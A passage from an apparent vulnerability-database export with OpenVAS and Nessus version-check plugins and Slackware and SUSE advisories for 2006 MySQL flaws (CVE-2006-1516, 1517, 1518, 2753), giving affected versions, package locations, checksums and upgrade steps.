FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.56861\");\n script_tag(name:\"creation_date\", value:\"2012-09-11 01:34:21 +0200 (Tue, 11 Sep 2012)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 10:16:15 +0100 (Fri, 15 Mar 2019) $\");\n script_cve_id(\"CVE-2006-1516\", \"CVE-2006-1517\", \"CVE-2006-2753\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_version(\"$Revision: 14202 $\");\n script_name(\"Slackware Advisory SSA:2006-155-01 mysql\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Slackware Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/slackware_linux\", \"ssh/login/slackpack\", re:\"ssh/login/release=SLK(9\\.1|10\\.0|10\\.1|10\\.2)\");\n\n script_xref(name:\"URL\", value:\"https://secure1.securityspace.com/smysecure/catid.html?in=SSA:2006-155-01\");\n script_xref(name:\"URL\", value:\"http://lists.mysql.com/announce/364\");\n script_xref(name:\"URL\", value:\"http://lists.mysql.com/announce/365\");\n\n script_tag(name:\"insight\", value:\"New mysql packages are available for Slackware 9.1, 10.0, 10.1,\n10.2 and -current to fix security issues.\n\nThe MySQL packages shipped with Slackware 9.1, 10.0, and 10.1\nmay possibly leak sensitive information found in uninitialized\nmemory to authenticated users. This is fixed in the new packages,\nand was already patched in Slackware 10.2 and -current.\nSince the vulnerabilities require a valid login and/or access to the\ndatabase server, the risk is moderate. Slackware does not provide\nnetwork access to a MySQL database by default.\n\nThe MySQL packages in Slackware 10.2 and -current have been\nupgraded to MySQL 4.1.20 (Slackware 10.2) and MySQL 5.0.22\n(Slackware -current) to fix an SQL injection vulnerability.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to the new package(s).\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update as announced\nvia advisory SSA:2006-155-01.\");\n\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-slack.inc\");\n\nreport = \"\";\nres = \"\";\n\nif((res = isslkpkgvuln(pkg:\"mysql\", ver:\"4.0.27-i486-1_slack9.1\", rls:\"SLK9.1\")) != NULL) {\n report += res;\n}\nif((res = isslkpkgvuln(pkg:\"mysql\", ver:\"4.0.27-i486-1_slack10.0\", rls:\"SLK10.0\")) != NULL) {\n report += res;\n}\nif((res = isslkpkgvuln(pkg:\"mysql\", ver:\"4.0.27-i486-1_slack10.1\", rls:\"SLK10.1\")) != NULL) {\n report += res;\n}\nif((res = isslkpkgvuln(pkg:\"mysql\", ver:\"4.1.20-i486-1_slack10.2\", rls:\"SLK10.2\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2017-07-24T12:50:39", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-1517", "CVE-2006-2753", "CVE-2006-1516"], "description": "The remote host is missing an update as announced\nvia advisory SSA:2006-155-01.", "modified": "2017-07-07T00:00:00", "published": "2012-09-11T00:00:00", "id": "OPENVAS:56861", "href": "http://plugins.openvas.org/nasl.php?oid=56861", "type": "openvas", "title": "Slackware Advisory SSA:2006-155-01 mysql", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: esoft_slk_ssa_2006_155_01.nasl 6598 2017-07-07 09:36:44Z cfischer $\n# Description: Auto-generated from the corresponding slackware advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"New mysql packages are available for Slackware 9.1, 10.0, 10.1,\n10.2 and -current to fix security issues.\n\nThe MySQL packages shipped with Slackware 9.1, 10.0, and 10.1\nmay possibly leak sensitive information found in uninitialized\nmemory to authenticated users. This is fixed in the new packages,\nand was already patched in Slackware 10.2 and -current.\nSince the vulnerabilities require a valid login and/or access to the\ndatabase server, the risk is moderate. Slackware does not provide\nnetwork access to a MySQL database by default.\n\nThe MySQL packages in Slackware 10.2 and -current have been\nupgraded to MySQL 4.1.20 (Slackware 10.2) and MySQL 5.0.22\n(Slackware -current) to fix an SQL injection vulnerability.\n\nFor more details, see the MySQL 4.1.20 release announcement here:\nhttp://lists.mysql.com/announce/364\nAnd the MySQL 5.0.22 release announcement here:\nhttp://lists.mysql.com/announce/365\";\ntag_summary = \"The remote host is missing an update as announced\nvia advisory SSA:2006-155-01.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=SSA:2006-155-01\";\n \nif(description)\n{\n script_id(56861);\n script_tag(name:\"creation_date\", value:\"2012-09-11 01:34:21 +0200 (Tue, 11 Sep 2012)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 11:36:44 +0200 (Fri, 07 Jul 2017) $\");\n script_cve_id(\"CVE-2006-1516\", \"CVE-2006-1517\", \"CVE-2006-2753\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_version(\"$Revision: 6598 $\");\n name = \"Slackware Advisory SSA:2006-155-01 mysql \";\n script_name(name);\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Slackware Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/slackware_linux\", \"ssh/login/slackpack\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-slack.inc\");\nvuln = 0;\nif(isslkpkgvuln(pkg:\"mysql\", ver:\"4.0.27-i486-1_slack9.1\", rls:\"SLK9.1\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"mysql\", ver:\"4.0.27-i486-1_slack10.0\", rls:\"SLK10.0\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"mysql\", ver:\"4.0.27-i486-1_slack10.1\", rls:\"SLK10.1\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"mysql\", ver:\"4.1.20-i486-1_slack10.2\", rls:\"SLK10.2\")) {\n vuln = 1;\n}\n\nif(vuln) {\n security_message(0);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-02T21:10:13", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-1518"], "description": "The remote host is missing an update to the system\nas announced in the referenced advisory.", "modified": "2016-09-26T00:00:00", "published": "2008-09-04T00:00:00", "id": "OPENVAS:56714", "href": "http://plugins.openvas.org/nasl.php?oid=56714", "type": "openvas", "title": "FreeBSD Ports: mysql-server", "sourceData": "#\n#VID a8d8713e-dc83-11da-a22b-000c6ec775d9\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from vuxml or freebsd advisories\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The following package is affected: mysql-server\n\nCVE-2006-1518\nBuffer overflow in the open_table function in sql_base.cc in MySQL\n5.0.x up to 5.0.20 might allow remote attackers to execute arbitrary\ncode via crafted COM_TABLE_DUMP packets with invalid length values.\";\ntag_solution = \"Update your system with the appropriate patches or\nsoftware upgrades.\n\nhttp://www.wisec.it/vulns.php?page=8\nhttp://dev.mysql.com/doc/refman/5.0/en/news-5-0-21.html\nhttp://marc.theaimsgroup.com/?l=bugtraq&m=114659633220473\nhttp://www.vuxml.org/freebsd/a8d8713e-dc83-11da-a22b-000c6ec775d9.html\";\ntag_summary = \"The remote host is missing an update to the system\nas announced in the referenced advisory.\";\n\n\nif(description)\n{\n script_id(56714);\n script_version(\"$Revision: 4144 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2016-09-26 07:28:56 +0200 (Mon, 26 Sep 2016) $\");\n script_tag(name:\"creation_date\", value:\"2008-09-04 20:41:11 +0200 (Thu, 04 Sep 2008)\");\n script_cve_id(\"CVE-2006-1518\");\n script_tag(name:\"cvss_base\", value:\"6.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:P/I:P/A:P\");\n script_name(\"FreeBSD Ports: mysql-server\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2006 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"FreeBSD Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/freebsdrel\", \"login/SSH/success\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-bsd.inc\");\n\ntxt = \"\";\nvuln = 0;\nbver = portver(pkg:\"mysql-server\");\nif(!isnull(bver) && revcomp(a:bver, b:\"5.0\")>0 && revcomp(a:bver, b:\"5.0.21\")<0) {\n txt += 'Package mysql-server version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\n\nif(vuln) {\n security_message(data:string(txt));\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 6.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "slackware": [{"lastseen": "2020-10-25T16:36:14", "bulletinFamily": "unix", "cvelist": ["CVE-2006-1516", "CVE-2006-1517", "CVE-2006-1518"], "description": "New mysql packages are available for Slackware 10.2 and -current to\nfix security issues. The MySQL package shipped with Slackware 10.2\nmay possibly leak sensitive information found in uninitialized\nmemory to authenticated users. The MySQL package previously in\nSlackware -current also suffered from these flaws, but an additional\noverflow could allow arbitrary code execution.\n\nSince the vulnerabilities require a valid login and/or access to the\ndatabase server, the risk is moderate. Slackware does not provide\nnetwork access to a MySQL database by default.\n\n\nMore details about the issues may be found in the Common\nVulnerabilities and Exposures (CVE) database.\nIssues that affect both Slackware 10.2 and -current:\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1516\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1517\n\nAn issue affecting only Slackware -current:\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1518\n\n\nHere are the details from the Slackware 10.2 ChangeLog:\n\npatches/packages/mysql-4.1.19-i486-1.tgz:\n Upgraded to mysql-4.1.19.\n This fixes some minor security issues with possible information leakage.\n Note that the information leakage bugs require that the attacker have\n access to an account on the database. Also note that by default,\n Slackware's rc.mysqld script does *not* allow access to the database\n through the outside network (it uses the --skip-networking option).\n If you've enabled network access to MySQL, it is a good idea to filter\n the port (3306) to prevent access from unauthorized machines.\n For more information, see:\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1516\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1517\n (* Security fix *)\n\nHere are the details from the Slackware -current ChangeLog:\n\nap/mysql-5.0.21-i486-1.tgz: Upgraded to mysql-5.0.21.\n This fixes some security issues, including possible information leakage, and\n execution of arbitrary code. Note that the information leakage bugs require\n that the attacker have access to an account on the database. Also note that\n by default, Slackware's rc.mysqld script does *not* allow access to the\n database through the outside network (it uses the --skip-networking option).\n If you've enabled network access to MySQL, it is a good idea to filter the\n port (3306) to prevent access from unauthorized machines.\n For more information, see:\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1516\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1517\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1518\n (* Security fix *)\n\nWhere to find the new packages:\n\nUpdated package for Slackware 10.2:\nftp://ftp.slackware.com/pub/slackware/slackware-10.2/patches/packages/mysql-4.1.19-i486-1.tgz\n\nUpdated package for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/ap/mysql-5.0.21-i486-1.tgz\n\n\nMD5 signatures:\n\nSlackware 10.2 package:\nc229e19d782404da119be46355a170d2 mysql-4.1.19-i486-1.tgz\n\nSlackware -current package:\n51008b23954c0d82c2670290476d0249 mysql-5.0.21-i486-1.tgz\n\n\nInstallation instructions:\n\nUpgrade the package as root:\n > upgradepkg mysql-4.1.19-i486-1.tgz\n\nThen, restart the database server:\n > sh /etc/rc.d/rc.mysqld restart", "modified": "2006-05-09T22:19:51", "published": "2006-05-09T22:19:51", "id": "SSA-2006-129-02", "href": "http://www.slackware.com/security/viewer.php?l=slackware-security&y=2006&m=slackware-security.507293", "type": "slackware", "title": "[slackware-security] mysql", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2020-10-25T16:36:12", "bulletinFamily": "unix", "cvelist": ["CVE-2006-1516", "CVE-2006-1517", "CVE-2006-2753"], "description": "New mysql packages are available for Slackware 9.1, 10.0, 10.1,\n10.2 and -current to fix security issues.\n\n\nThe MySQL packages shipped with Slackware 9.1, 10.0, and 10.1\nmay possibly leak sensitive information found in uninitialized\nmemory to authenticated users. This is fixed in the new packages,\nand was already patched in Slackware 10.2 and -current.\nSince the vulnerabilities require a valid login and/or access to the\ndatabase server, the risk is moderate. Slackware does not provide\nnetwork access to a MySQL database by default.\n\nMore details about the issues may be found in the Common\nVulnerabilities and Exposures (CVE) database.\nFixes that affect Slackware 9.1, 10.0, and 10.1:\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1516\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1517\n\n\nThe MySQL packages in Slackware 10.2 and -current have been\nupgraded to MySQL 4.1.20 (Slackware 10.2) and MySQL 5.0.22\n(Slackware -current) to fix an SQL injection vulnerability.\n\nFor more details, see the MySQL 4.1.20 release announcement here:\n http://lists.mysql.com/announce/364\nAnd the MySQL 5.0.22 release announcement here:\n http://lists.mysql.com/announce/365\nThe CVE entry for this issue can be found here:\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2753\n\n\nHere are the details from the Slackware 10.1 ChangeLog:\n\npatches/packages/mysql-4.0.27-i486-1_slack10.1.tgz:\n Upgraded to mysql-4.0.27.\n This fixes some minor security issues with possible information leakage.\n Note that the information leakage bugs require that the attacker have\n access to an account on the database. Also note that by default,\n Slackware's rc.mysqld script does *not* allow access to the database\n through the outside network (it uses the --skip-networking option).\n If you've enabled network access to MySQL, it is a good idea to filter\n the port (3306) to prevent access from unauthorized machines.\n For more details, see the MySQL 4.0.27 release announcement here:\n http://lists.mysql.com/announce/359\n For more information, see:\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1516\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1517\n (* Security fix *)\n\nHere are the details from the Slackware 10.2 ChangeLog:\n\npatches/packages/mysql-4.1.20-i486-1_slack10.2.tgz:\n Upgraded to mysql-4.1.20. This fixes an SQL injection vulnerability.\n For more details, see the MySQL 4.1.20 release announcement here:\n http://lists.mysql.com/announce/364\n The CVE entry for this issue will be found here:\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2753\n\nWhere to find the new packages:\n\nHINT: Getting slow download speeds from ftp.slackware.com?\nGive slackware.osuosl.org a try. This is another primary FTP site\nfor Slackware that can be considerably faster than downloading\nfrom ftp.slackware.com.\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating additional FTP and rsync hosting\nto the Slackware project! :-)\n\nAlso see the \"Get Slack\" section on http://slackware.com for\nadditional mirror sites near you.\n\nUpdated package for Slackware 9.1:\nftp://ftp.slackware.com/pub/slackware/slackware-9.1/patches/packages/mysql-4.0.27-i486-1_slack9.1.tgz\n\nUpdated package for Slackware 10.0:\nftp://ftp.slackware.com/pub/slackware/slackware-10.0/patches/packages/mysql-4.0.27-i486-1_slack10.0.tgz\n\nUpdated package for Slackware 10.1:\nftp://ftp.slackware.com/pub/slackware/slackware-10.1/patches/packages/mysql-4.0.27-i486-1_slack10.1.tgz\n\nUpdated package for Slackware 10.2:\nftp://ftp.slackware.com/pub/slackware/slackware-10.2/patches/packages/mysql-4.1.20-i486-1_slack10.2.tgz\n\nUpdated package for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/ap/mysql-5.0.22-i486-1.tgz\n\n\nMD5 signatures:\n\nSlackware 9.1 package:\neea73f16715c07de52701b67f037e7ab mysql-4.0.27-i486-1_slack9.1.tgz\n\nSlackware 10.0 package:\n6afab2cdd09adf4b4f822db6c74b167e mysql-4.0.27-i486-1_slack10.0.tgz\n\nSlackware 10.1 package:\ncbe2044d3b75606de6f3796d607e7c0a mysql-4.0.27-i486-1_slack10.1.tgz\n\nSlackware 10.2 package:\n249bc3f4610cbedf8b0a6fc64c28c53f mysql-4.1.20-i486-1_slack10.2.tgz\n\nSlackware -current package:\naf1829c54b901bc01fcd269f27580b21 mysql-5.0.22-i486-1.tgz\n\n\nInstallation instructions:\n\nUpgrade the package as root:\n > upgradepkg mysql-4.1.20-i486-1_slack10.2.tgz\n\nThen, restart the database server:\n > sh /etc/rc.d/rc.mysqld restart", "modified": "2006-06-05T08:12:48", "published": "2006-06-05T08:12:48", "id": "SSA-2006-155-01", "href": "http://www.slackware.com/security/viewer.php?l=slackware-security&y=2006&m=slackware-security.599377", "type": "slackware", "title": "[slackware-security] mysql", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "suse": [{"lastseen": "2016-09-04T11:56:23", "bulletinFamily": "unix", "cvelist": ["CVE-2006-1517", "CVE-2006-1518", "CVE-2006-1516"], "description": "The database server MySQL was updated to fix the following security problems:\n#### Solution\nThere is no known workaround, please install the update packages.", "edition": 1, "modified": "2006-06-23T08:26:58", "published": "2006-06-23T08:26:58", "id": "SUSE-SA:2006:036", "href": "http://lists.opensuse.org/opensuse-security-announce/2006-06/msg00023.html", "title": "remote code execution in mysql", "type": "suse", "cvss": {"score": 6.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "nessus": [{"lastseen": "2021-01-17T14:46:45", "description": "Attackers could read portions of memory by using a user name with\ntrailing null byte or via COM_TABLE_DUMP command (CVE-2006-1516,\nCVE-2006-1517). Attackers could execute arbitrary code by causing a\nbuffer overflow via specially crafted COM_TABLE_DUMP packets\n(CVE-2006-1518).", "edition": 24, "published": "2007-10-17T00:00:00", "title": "openSUSE 10 Security Update : mysql (mysql-1312)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-1517", "CVE-2006-1518", "CVE-2006-1516"], "modified": "2007-10-17T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:mysql", "cpe:/o:novell:opensuse:10.1"], "id": "SUSE_MYSQL-1312.NASL", "href": "https://www.tenable.com/plugins/nessus/27356", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update mysql-1312.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(27356);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2006-1516\", \"CVE-2006-1517\", \"CVE-2006-1518\");\n\n script_name(english:\"openSUSE 10 Security Update : mysql (mysql-1312)\");\n script_summary(english:\"Check for the mysql-1312 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Attackers could read portions of memory by using a user name with\ntrailing null byte or via COM_TABLE_DUMP command (CVE-2006-1516,\nCVE-2006-1517). Attackers could execute arbitrary code by causing a\nbuffer overflow via specially crafted COM_TABLE_DUMP packets\n(CVE-2006-1518).\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected mysql package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:10.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2006/05/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2007/10/17\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2007-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE10\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"10.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE10.1\", reference:\"mysql-5.0.18-16.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"mysql\");\n}\n", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2021-01-17T14:14:48", "description": "The remote host is missing the patch for the advisory SUSE-SA:2006:036 (mysql).\n\n\nThe database server MySQL was updated to fix the following security problems:\n\n- Attackers could read portions of memory by using a user name with\ntrailing null byte or via COM_TABLE_DUMP command (CVE-2006-1516,\nCVE-2006-1517).\n\n- Attackers could potentially execute arbitrary code by causing a\nbuffer overflow via specially crafted COM_TABLE_DUMP packets\n(CVE-2006-1518).\n\nThe mysql server package was released on May 30th already, the\nmysql-Max server package was released on June 20th after additional\nbugfixes.", "edition": 6, "published": "2007-02-18T00:00:00", "title": "SUSE-SA:2006:036: mysql", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-1517", "CVE-2006-1518", "CVE-2006-1516"], "modified": "2007-02-18T00:00:00", "cpe": [], "id": "SUSE_SA_2006_036.NASL", "href": "https://www.tenable.com/plugins/nessus/24416", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# This plugin text was extracted from SuSE Security Advisory SUSE-SA:2006:036\n#\n\n\nif ( ! defined_func(\"bn_random\") ) exit(0);\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif(description)\n{\n script_id(24416);\n script_version(\"1.10\");\n \n name[\"english\"] = \"SUSE-SA:2006:036: mysql\";\n \n script_name(english:name[\"english\"]);\n \n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is missing a vendor-supplied security patch\" );\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is missing the patch for the advisory SUSE-SA:2006:036 (mysql).\n\n\nThe database server MySQL was updated to fix the following security problems:\n\n- Attackers could read portions of memory by using a user name with\ntrailing null byte or via COM_TABLE_DUMP command (CVE-2006-1516,\nCVE-2006-1517).\n\n- Attackers could potentially execute arbitrary code by causing a\nbuffer overflow via specially crafted COM_TABLE_DUMP packets\n(CVE-2006-1518).\n\nThe mysql server package was released on May 30th already, the\nmysql-Max server package was released on June 20th after additional\nbugfixes.\" );\n script_set_attribute(attribute:\"solution\", value:\n\"http://www.novell.com/linux/security/advisories/2006_36_mysql.html\" );\n script_set_attribute(attribute:\"risk_factor\", value:\"High\" );\n\n\n\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2007/02/18\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n script_end_attributes();\n\n \n summary[\"english\"] = \"Check for the version of the mysql package\";\n script_summary(english:summary[\"english\"]);\n \n script_category(ACT_GATHER_INFO);\n \n script_copyright(english:\"This script is Copyright (C) 2007-2021 Tenable Network Security, Inc.\");\n family[\"english\"] = \"SuSE Local Security Checks\";\n script_family(english:family[\"english\"]);\n \n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/SuSE/rpm-list\");\n exit(0);\n}\n\ninclude(\"rpm.inc\");\nif ( rpm_check( reference:\"mysql-4.1.13-3.4\", release:\"SUSE10.0\") )\n{\n security_hole(0);\n exit(0);\n}\nif ( rpm_check( reference:\"mysql-4.0.18-32.23\", release:\"SUSE9.1\") )\n{\n security_hole(0);\n exit(0);\n}\nif ( rpm_check( reference:\"mysql-Max-4.0.18-32.26\", release:\"SUSE9.1\") )\n{\n security_hole(0);\n exit(0);\n}\nif ( rpm_check( reference:\"mysql-4.0.21-4.8\", release:\"SUSE9.2\") )\n{\n security_hole(0);\n exit(0);\n}\nif ( rpm_check( reference:\"mysql-Max-4.0.21-4.8\", release:\"SUSE9.2\") )\n{\n security_hole(0);\n exit(0);\n}\nif ( rpm_check( reference:\"mysql-4.1.10a-3.6\", release:\"SUSE9.3\") )\n{\n security_hole(0);\n exit(0);\n}\nif ( rpm_check( reference:\"mysql-Max-4.1.10a-3.6\", release:\"SUSE9.3\") )\n{\n security_hole(0);\n exit(0);\n}\n", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2021-01-17T09:10:17", "description": "New mysql packages are available for Slackware 10.2 and -current to\nfix security issues. The MySQL package shipped with Slackware 10.2 may\npossibly leak sensitive information found in uninitialized memory to\nauthenticated users. The MySQL package previously in Slackware\n-current also suffered from these flaws, but an additional overflow\ncould allow arbitrary code execution. Since the vulnerabilities\nrequire a valid login and/or access to the database server, the risk\nis moderate. Slackware does not provide network access to a MySQL\ndatabase by default.", "edition": 23, "published": "2006-05-13T00:00:00", "title": "Slackware 10.2 / current : mysql (SSA:2006-129-02)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-1517", "CVE-2006-1518", "CVE-2006-1516"], "modified": "2006-05-13T00:00:00", "cpe": ["cpe:/o:slackware:slackware_linux", "cpe:/o:slackware:slackware_linux:10.2", "p-cpe:/a:slackware:slackware_linux:mysql"], "id": "SLACKWARE_SSA_2006-129-02.NASL", "href": "https://www.tenable.com/plugins/nessus/21345", 